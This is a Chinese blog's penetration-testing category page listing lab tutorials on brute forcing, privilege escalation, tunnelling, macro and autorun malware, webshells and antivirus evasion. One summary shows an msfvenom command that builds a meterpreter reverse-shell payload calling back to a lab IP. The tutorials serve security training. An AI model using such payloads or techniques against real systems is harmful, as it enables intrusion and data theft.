![](https://img-blog.csdnimg.cn/09eac0b8ff254dae87d78d7189ad059a.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
渗透测试
文章平均质量分 77
内网渗透,攻击和预防
Bruce_Liuxiaowei
“对我而言, 武术的非凡之处在于它的简单。简单的方法也是正确的方法,同时武术也没有什么特别之处。越接近武术的真谛,招式表现上浪费越少。”
--Bruce Lee, Jeet Kune Do 创始人
展开
-
Msfvenom制作自己的专属Shell
如何通过Msfvenom来生成用户自己的专属Shell?有时候我们上传Shell到目标主机后,不仅我们自己可以连接,其他用户也可以连接,有时候会导致我们丢失该Shell,甚至该shell被用户发现并查杀。原创 2024-07-09 21:00:29 · 204 阅读 · 0 评论 -
使用macof发起MAC地址泛洪攻击
MAC地址泛洪攻击是一种针对交换机的攻击方式,目的是监听同一局域网中用户的通信数据。交换机的工作核心:端口- MAC地址映射表。这张表记录了交换机每个端口和与之相连的主机MAC地址之间的对应关系。通常情况下,交换机的每个端口只会连接一台主机,因而在CAM表中每个端口只对应一个MAC地址。由于交换机的缓存有限,因此它的CAM表中能保存的内容也是有限的。现在交换机都使用级联技术,也就是A交换机可以连接到B交换机的级联端口。这样B交换机的级联端口上就对应多台主机的MAC地址,从而在CAM表中产生大量的记录。原创 2024-05-04 12:05:37 · 855 阅读 · 0 评论 -
勒索软件类型
勒索软件类型原创 2024-03-03 07:28:40 · 197 阅读 · 0 评论 -
域内横向移动分析及防御——DCOM在远程系统中的使用
DCOM(分布式组件对象模型)是微软的一系列概念和程序接口。通过DCOM, 客户端程序对象能够向网络中的另一台计算机上的服务器程序对象发送请求。DCOM是基于组件对象模型(COM)的。COM提供了一套允许在同一台计算机上的客户端和服务器之间进行通信的接口(运行在Windows95及之后版本的操作系统中)。原创 2023-12-26 10:26:57 · 508 阅读 · 0 评论 -
内网渗透测试基础——权限提升分析及防御
在Windows中,权限大概分为四种,分别是User、Administrator、System、TrustedInstaller。在这四种权限中,我们经常接触的是前三种。第四种权限TrustedInstaller,在常规使用中通常不会涉及。 低权限级别将使渗透测试受到很多限制。在Windows中,如果没有管理员权限,就无法进行等操作。 Windows操作系统中管理员账号的权限,以及Linux操作系统中root账户的权限,是操作系统的最高权限。提升权限(也称提权)的方式分为以下两类。原创 2023-12-23 11:34:25 · 1029 阅读 · 0 评论 -
隐藏通信隧道技术——防御DNS隧道攻击
DNS协议是一种请求/应答协议,也是一种可用于应用层的隧道技术。虽然激增的DNS流量可能会被发现,但是基于传统Socket隧道已经濒临淘汰及TCP、UDP通信大量被防御系统拦截的状况,DNS、ICMP、HTTP/HTTPS等难以被禁用的协议已成为攻击者控制隧道的主流渠道。原创 2023-12-21 20:32:31 · 877 阅读 · 0 评论 -
内网渗透测试基础——分析域内网段划分情况及拓扑结构
掌握了内网的相关信息后, 渗透测试人员可以分析目标网络的结构和安全防御策略,获取网段信息、各部门的IP地址段,并尝试绘制内网的拓扑结构图。当然,渗透测试人员无法了解内网的物理结构,只能从宏观上对内网建立一个整体认识原创 2023-12-21 08:41:47 · 1009 阅读 · 0 评论 -
隐藏通信隧道技术——防御SSH隧道攻击的思路
在内网中建立一个稳定、可靠的数据通道,对渗透测试工作来说具有重要的意义。应用层的隧道通信技术主要利用应用软件提供的端口来发送数据。常用的隧道协议有SSH、HTTP/HTTPS和DNS。原创 2023-12-20 22:46:28 · 500 阅读 · 0 评论 -
内网渗透测试基础——敏感数据的防护
内网的核心敏感数据,不仅包括数据库、电子邮件,还包括个人数据及组织的业务数据、技术数据等。可以说,价值较高的数据基本都在内网中。因此,了解攻击者的操作流程,对内网数据安全防护工作至关重要。原创 2023-12-20 11:36:02 · 522 阅读 · 0 评论 -
内网渗透测试基础——内网信息收集
在内网渗透测试环境中,有很多设备和防护软件,例如Bit9、ArcSight、Maniant等。它们通过收集目标内网的信息,洞察内网网络拓扑结构,找出内网中最薄弱的环节。信息收集的深度,直接关系到内网渗透测试的成败。原创 2023-12-20 09:00:19 · 876 阅读 · 0 评论 -
内网渗透测试基础——Windows PowerShell篇
Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在每个受支持的Windows版本中(Windows7、Windows Server 2008 R2及更高版本),为Windows命令行使用者和脚本编写者利用.NET Framework的强大功能提供了便利。只要可以在一台计算机上运行代码,就可将PowerShell脚本文件(.ps1)下载到磁盘中执行(甚至无须将脚本文件写到磁盘中)。也可以把PowerShell看作命令提示符cmd.exe的扩展。原创 2023-12-16 21:51:06 · 591 阅读 · 0 评论 -
渗透测试框架——Cobalt Strike
Cobalt Strike是一款非常成熟的渗透测试框架。Cobalt Strike在3.0版本之前是基于Metasploit框架工作的,可以使用Metasploit的漏洞库。从3.0版本开始,Cobalt Strike不再使用Metasploit的漏洞库,成为一个独立的渗透测试平台。Cobalt Strike是用Java语言编写的。可以进行团队协作,以搭建了Cobalt Strike的TeamServer服务的服务器为中转站,使目标系统权限反弹到该TeamServer服务器上。同时,Cobalt Strik原创 2023-12-14 22:55:32 · 1248 阅读 · 0 评论 -
Python编程--使用PyPDF解析PDF文件中的元数据
作为一种文件里非常明显可见的对象,元数据可以存在于文档、电子表格、图片、音频和视频文件中。创建这些文件的应用程序可能会把文档的作者、创建和修改时间、可能的更新版本和注释这类详细信息存储下来。例如,手机照相会把照片的GPS位置信息存下来,微软的Word程序也可能会保存文档的作者信息。互联网上至今还能下载到某黑客组织的某个成员的匿名发布的稿子–ANONOPS_The_Press_Release.pdf。匿名者在稿件中发布信息,组织号召要通过对涉及的一些机构进行分布式拒绝服务攻击(DDoS)以实现报复。这个稿子既原创 2022-06-29 17:39:03 · 837 阅读 · 0 评论 -
Python编程--目标IP地址段主机指定端口状态扫描
渗透测试经常需要进行针对目标主机IP地址段的各主机的端口进行扫描,然后输出目标主机的开放端口的状态。现利用nmap-python模块编写一个扫描脚本程序。代码如下:针对目标IP地址段(192.168.31.33-240)端口(21,22, 25, 445)进行扫描,结果如下所示:...原创 2022-06-26 09:52:30 · 1045 阅读 · 0 评论 -
Python编程--使用Ftplib暴力破解FTP用户口令
暴力破解FTP用户名/密码,假设用户名/密码对是存储在一个纯文本文件中。如下所示:创建一个名为bruteLogin()的函数,这个函数接收的参数是主机名和含有密码的文件,返回一个能登录该主机的用户名/密码。该函数逐行读取文件中的每一行记录,用户名和密码之间是以冒号分隔的。然后函数尝试用这个用户名和密码登录FTP服务器。如果成功,则返回一个用户名和密码的tuple。如果失败,跳过该异常继续到下一行。如果函数穷尽所有行仍未成功登录,则返回一个值为None 、None的tuple。示例代码如下:通过遍历用户名原创 2022-06-25 14:29:16 · 1345 阅读 · 0 评论 -
Python编程--使用NMAP端口扫描
安装好Python-Namp模块,(pip install python-nmap)。创建一个PortScanner()类对象,这使我们能用这个对象完成扫描操作。PortScanner类有一个scan()函数,它可将目标和端口的列表作为参数输入,并对它们进行基本的Nmap扫描。另外,还可以把目标主机的地址/端口放入数组中备查,并打印出端口的状态。示例代码如下:执行这个脚本,运行结果如下图:...原创 2022-06-24 16:23:09 · 1801 阅读 · 0 评论 -
Python编程--sys模块及OS模块简单用例
内置的sys模块使我们能访问到由Python解释器使用或维护的对象,其中包括标志、版本、整型数的最大尺寸、可用的模块、hook路径、标准错误/输入/输出的位置,以及调用解释器的命令行参数。比如,我们或许想要在运行时解析命令行参数。比如,漏洞扫描器:如果我们想把一个文本文件的文件名作为命令参数传递进来该怎么办?sys.argv列表中含有所有的命令行参数。第一个sys.argv[0]元素中的是Python脚本名称,列表中的其余参数则记录了之后所有的命令行参数。如果我们只传递一个额外的参数,sys.argv中应该原创 2022-06-23 20:34:43 · 191 阅读 · 0 评论 -
Kali渗透测试:拒绝服务攻击
故意占用某一系统对外服务的有限资源,从而导致其无法正常工作的行为就是拒绝服务攻击。拒绝服务攻击是指攻击者想办法让目标停止提供服务,是黑客常用的攻击手段之一。其实对网络带宽进行的消耗性攻击知识拒绝服务攻击的一小部分,只要能够对目标造成麻烦,事情某些服务暂停甚至是主机死机,都属于拒绝服务攻击。拒绝服务攻击一直得不到合理的解决,究其原因是网络协议本身的安全缺陷,使得拒绝服务攻击也成了攻击者的“终极手段”。实际上,拒绝服务攻击并不是一种攻击方式,而是一类具有相似特征的攻击方式的集合。黑客可能利用TCP/IP模型中的原创 2022-05-31 21:49:25 · 4785 阅读 · 1 评论 -
Kali渗透测试:散列密码破解
Kali渗透测试:散列密码破解某些网站的安全机制设置有缺陷,导致自身的关键数据库被渗透。很多用户在不同网站使用的是相同的用户名和密码,因此黑客可以通过获取通过获取用户在A网站的用户名和密码从而尝试登录B网站,这就是“撞库攻击”。 如2014年12月25日开始在互联网上“疯传的”12306网站用户信息,就是黑客通过撞库攻击所获得的。被泄漏的数据库中的数据大都是明文,不过,现在的数据库大都采用了散列加密的方式保存。如Windows操作系统就采用散列加密的方式保存登录密码。这些密码都是经过了散列加密后保存到原创 2022-05-26 08:51:01 · 4099 阅读 · 2 评论 -
Kali 渗透测试:使用Burp Suite 对网络认证服务的攻击
Kali 渗透测试:使用Burp Suite 对网络认证服务的攻击Burp Suite 是用于攻击Web应用的集成平台,这个平台集成了许多工具。如何使用它来破解一些网站的密码。首先我们查看一个需要用户名和密码的登录界面(这个实例使用了经典的Web渗透测试平台Pikachu),如下图所示:首先,在Kali中启动Burp Suite这个工具,如下图所示:Burp Suite在这里的主要作用是在用户使用的浏览器和目标服务器之间充当一个中间人的角色。这样当我们在浏览器中输入数据之后,数据包首先会被提交到B原创 2022-05-25 08:09:33 · 2655 阅读 · 1 评论 -
Kali渗透测试:身份认证攻击
Kali渗透测试:身份认证攻击1.1 简单网络服务认证的攻击网络上很多常见的应用都采用了密码认证的方式,如SSH、Telnet、FTP等。这些应用被广泛应用在各种网络设备上,如果这些认证模式出现问题,就意味着网络中的大量设备将会沦陷。针对这些常见的网络服务认证,我们可以采用一种“暴力破解”的方法。就是把所有可能的密码都尝试一遍。一般有以下3种思路:1.1.1 纯字典攻击这种思路最简单,攻击者只需要利用攻击工具将用户名和字典中的密码组合起来,一个一个尝试即可。破解成功的概率与选用的字典有很大关系。原创 2022-05-24 11:29:53 · 2533 阅读 · 0 评论 -
Kali渗透测试:网络数据的嗅探与欺骗
Kali渗透测试:网络数据的嗅探与欺骗无论什么样的漏洞渗透模块,在网络中都是以数据包的形式传输的,因此如果我们能够对网络中的数据包进行分析,就可以掌握渗透的原理。 另外,很多网络攻击的方法也都是发送精心构造的数据包来完成的, 如常见的ARP欺骗。利用这种欺骗方式,黑客可以截获受害计算机与外部通信的全部数据,如受害者登录使用的用户名与密码、发送的邮件等。“The quieter you are the more you are able to hear”(你越安静,你能听到的越多)。如使用HTTP、FTP原创 2022-05-23 12:01:43 · 8262 阅读 · 5 评论 -
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块
Kali 渗透测试:基于结构化异常处理的渗透随着Windows操作系统的安全性不断提高(尤其是Windows 10等操作系统的推出),这种简单地利用JMP ESP指令执行数据区域代码的方法已经很难实现了。不过很快就有人发现了一个新途径,那就是Windows操作系统下的结构化异常处理(Structured Exception Handing SEH)机制。有编程经验的人一定会对try/except 或者try/catch这种结构不陌生(其实这就是结构化异常处理):try: // 要执行的代码exce原创 2022-05-21 13:43:33 · 2127 阅读 · 0 评论 -
Kali渗透测试:对软件的溢出漏洞进行测试
Kali渗透测试:对软件的溢出漏洞进行测试如何对一个软件进行渗透,渗透目标是FreeFloat FTP Server, 这是一款十分简单的FTP服务器软件。FreeFloat FTP Server会在运行的主机上建立一个FTP服务器,其他计算机上的用户可以登录这个FTP服务器来存取文件。如我们在IP地址为192.168.68.160的主机的C盘中运行FreeFloat FTP Server,在另一台计算机中可以使用FTP下载工具或者命令的方式对其进行访问。这里我们采用命令的方式对其进行访问,如下图所示:原创 2022-05-20 16:03:19 · 736 阅读 · 0 评论 -
Kali渗透测试:Windows事件管理工具wevtutil的使用方法
Kali渗透测试:Windows事件管理工具wevtutil使用方法渗透测试者发现可以利用事件日志(event logging)的方式来启动某一个程序。Windows系统对事件操作的工具就是Windows系统自带的wevtutil.exe(windows event utility),使您能够检索有关事件日志和发布者的信息。您还可以使用此命令安装和卸载事件清单、运行查询以及导出、存档和清除日志。1. 语法(Syntax)wevtutil [{el | enum-logs}] [{gl | get-l原创 2022-05-19 23:09:33 · 2869 阅读 · 0 评论 -
Kali渗透测试:自动播放文件攻击
Kali渗透测试:自动播放文件攻击我们经常会遇到这样一种令人十分烦恼的木马文件,如只要U盘插到计算机上,就会立刻执行的病毒。SET中也提供了这种攻击方式。图中红框所示的第3种攻击方式就是感染式媒介生成器, 这里的媒介指的就是光盘和U盘等。目前,光盘已经极为少见了,所以我只介绍U盘这种媒介感染。当这种渗透测试执行时,会产生两个文件,一个是autorun.inf文件,另一个是Metasploit的攻击载荷文件,即payload.exe文件。当这个移动媒介(如U盘)插入计算机上时,autorun.inf文件原创 2022-05-18 16:18:09 · 503 阅读 · 0 评论 -
Kali渗透测试:社会工程学工具
Kali渗透测试:社会工程学工具人是网络安全中一个远比设备和程序更重要的因素。在网络安全中,社会工程学所攻击的目标 就是人。在现实中,往往人的一点疏忽就导致了网络中的所有防御手段形同虚设。1.1 社会工程学的概念社会工程学是一个通过研究受害者心理,并以此诱使受害者做出配合,从而达到自身目的的学科。黑客米特尼克(Mitnick)在他的作品《反欺骗的艺术》中第一次提到社会工程学,他认为长期以来在网络安全领域中,社会工程学指的就是利用受害者的心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱的手段,一些犯罪分原创 2022-05-18 10:35:33 · 4753 阅读 · 0 评论 -
Kali渗透测试:使用Armitage针对漏洞进行攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击以ms17_010_eternable模块为例(“永恒之蓝”)经典的漏洞,单击这个模块以后就可以开始攻击了。实 验 环 境攻击机:Linux kali 5.10.0. IP : 192.168.68.125靶机: Win2008 IP: 192.168.68.205实 验 步 骤1. 在工作区搜索ms17_010模块打开Armitage,搜索ms17_010模块,如下图所示:2. 选中ms17_010_eternablu原创 2022-05-17 16:34:13 · 1719 阅读 · 3 评论 -
Kali渗透测试:使用Armitage扫描网络
Kali渗透测试:使用Armitage扫描网络Armitage提供了一些常用的扫描功能,这些功能来自Nmap, 我们无须在两个工具之间切换,在Armitage中就可以完成所有工作。我们首先使用Nmap扫描目标系统,默认会扫描同一网段内的所有活跃主机,扫描的方式是单击菜单栏上的“Hosts”, 然后在下拉菜单中选择“Nmap Scan”,如下图所示:Nmap Scan一共提供了8种扫描方式,几乎涵盖了Nmap的所有经典扫描方式。其中Intense Scan(深度扫描),Quick Scan(快速扫描),原创 2022-05-17 10:56:17 · 410 阅读 · 0 评论 -
Kali渗透测试:使用 Armitage生成被控端和主控端
Kali渗透测试:使用 Armitage生成被控端和主控端Armitage就是一款使用Java为Metasploit编写的有图形化操作界面的软件,通过它可以轻松的使用Metasploit对目标进行攻击。Armitage的工作界面如图所示:首先我们在区域1中选中“payload”, 然后选择“windows” ➡️“meterpreter”, 找到所需的攻击载荷(即meterpreter_reverse_tcp)来充当被控端,如下图所示:双击这个攻击载荷,会弹出下图的界面,在该界面中可以对mete原创 2022-05-17 09:26:48 · 711 阅读 · 0 评论 -
Kali渗透测试:Metasploit 6.0 中的Evasion模块
Kali渗透测试:Metasploit 6.0 中的Evasion模块Metasploit 开发团队一直致力于免杀技术的研究,并且将一些研究成果应用在了这款产品中。其中Evasion模块可以生成免杀的远程控制被控端。在启动Metasploit时,可以看到Evasion模块,启动命令如下:┌──(root💀kali)-[~]└─# msfconsole8个evasion模块,如下图所示:使用show evasion命令可以列出Metasploit 6.0中的所有Evasion模块msf6 &g原创 2022-05-11 17:20:07 · 784 阅读 · 0 评论 -
Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹
Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹 长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也在一直致力于研究避开检测的方法(简称为免杀技术)。远程控制被控端也可被看作病毒的一种。 到目前为止,杀毒软件主要使用了3种技术。如下:基于文件扫描的反病毒技术。这种技术主要依靠对程序的二进制代码进行检测,反病毒工程师将病毒样本中的一段特有的二进制代码串提取出来作为特征码,并将其加入病毒库,检测程序时看它是否包含这个特征码。基于原创 2022-05-09 23:49:21 · 3697 阅读 · 5 评论 -
Kali 渗透测试:Meterpreter在Windows系统下的使用
Kali 渗透测试:Meterpreter在Windows系统下的使用实 验 环 境:VMware Workstation 16 PRO操作机:Kali Linux 5.10.0 IP(192.168.68.125)靶机:Win7实 验 步 骤:1. 生成被控端payload在操作机执行如下命令:┌──(root💀kali)-[~]└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.68.125 L原创 2022-05-11 12:25:11 · 3007 阅读 · 1 评论 -
Kali渗透测试:使用Word宏病毒进行渗透攻击
Kali渗透测试:使用宏病毒进行渗透攻击VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。构造一个包含宏病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 宏病毒会执行, 然后感染其他文件或原创 2022-05-14 17:00:44 · 4378 阅读 · 4 评论 -
漏洞扫描技术:对Web应用程序进行漏洞扫描
漏洞扫描技术:对Web应用程序进行漏洞扫描 Web应用程序最大的威胁还是来自内部代码的威胁,这种威胁主要来源于Web程序开发者在开发过程中出现的失误,或者因为使用了不安全的函数或者组件造成的。由于世界上的Web程序数量极其众多,因而对其进行研究十分复杂。目前国际上对Web安全的权威参考主要来自开放式Web应用程序安全项目(OWASP),它是由Mark Cuphey在2009年创办的,该项目致力于对应用软件的安全研究。zaproxy是世界上很受欢迎的免费安全扫描工具之一,由数百名国际志愿者积极维护它可原创 2022-05-05 17:12:02 · 3373 阅读 · 0 评论 -
Kali渗透测试:使用browser_autopwn2模块进行渗透攻击
Kali渗透测试:使用browser_autopwn2模块进行渗透攻击如果觉得一个一个地选择模块很麻烦, 也可以使用browser_autopwn模块。这种攻击的思路是渗透者构造一个攻击用的Web服务器,然后将这Web服务器的地址发给我目标用户,当目标用户使用有漏洞的浏览器打开这个地址的时候,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功,就会在目标主机上建立一个Meterpreter会话。实 验 环 境攻击机:Linux kali 5.10.0 IP原创 2022-05-15 17:02:09 · 1178 阅读 · 2 评论 -
Kali渗透测试:远程控制程序基础
Kali渗透测试:远程控制程序基础测试环境:攻击机:Linux kali 5.16.0-kali (IP:192.168.68.248)靶机:WinXP (IP:192.168.68.159) Win7 (IP:192.168.68.206)1. 使用MSFPC生成被控端远程控制软件中的被控端和主控端必须是成对使用的。被控端运行在目标设备上,其功能挺起来和木马很像,实际上是如此,被控端(可以是一段代码,也可以是一个能直接执行的程序)。在Kali Li原创 2022-05-07 15:47:04 · 3637 阅读 · 1 评论 -
Kali渗透测试:通过Web应用程序实现远程控制
Kali渗透测试:通过Web应用程序实现远程控制 我们所接触的PHP、JSP这样的语言主要是用来开发Web应用程序的,但其实他们的功能十分强大,也可以实现远程控制的功能。我们经常听说的“网页木马”指的就是用PHP、JSP等Web开发语言完成的。这种“网页木马”的特点就是无须考虑被渗透目标的操作系统的类型,只需要考虑Web应用程序的类型,例如攻击目标是一个PHP语言编写的网站, 那么就需要使用PHP语言编写的木马。 目前有很多工具都提供了自动生成木马的功能, 例如国内十分流行的“中国菜刀” “中国蚁剑原创 2022-05-12 09:01:12 · 2082 阅读 · 3 评论 -
Kali 渗透测试:利用HTA文件进行渗透攻击
Kali 渗透测试:利用HTA文件进行渗透攻击由于浏览器安全技术发展很快,很多时候面对一些安全的浏览器(就是暂时没有发现漏洞的浏览器), 这时通常需要选择一种不需要依赖漏洞的手段,这种手段看起来是个正常的行为,如让访问伪造网站的受害者下载一个插件,但是这个文件不能是EXE文件这种很容易被发现的文件, 因此,HTML应用程序(HTML Application,HTA)文件就成了最好的选择。HTA文件可以使用HTML中的绝大多数标签、脚本等。直接将HTML保存成HTA文件,就是一个能够独立运行的软件。与普通原创 2022-05-13 22:21:44 · 1990 阅读 · 2 评论 -
macOS系统安装NMAP扫描工具
macOS系统安装NMAP扫描工具最近做Kali网络渗透测试实验,需要用到一些扫描工具。当然少不了大名鼎鼎的Nmap (“Network Mapper”) 工具。Nmap 是一款开源的网络扫描和安全审计工具。Nmap对单个集群可以非常有效的工作,但是同样能够快速扫描大型网络。Nmap利用原IP数据包以很新奇的方式来确定网络上哪些主机可达,那些可达的主机正在提供什么服务(应用程序的名字和版本),它们运行什么操作系统(操作系统的版本),还有他们正在使用的什么类型的包过滤/防火墙等很多其他的规格参数。当然Nm原创 2022-05-04 12:51:01 · 8754 阅读 · 3 评论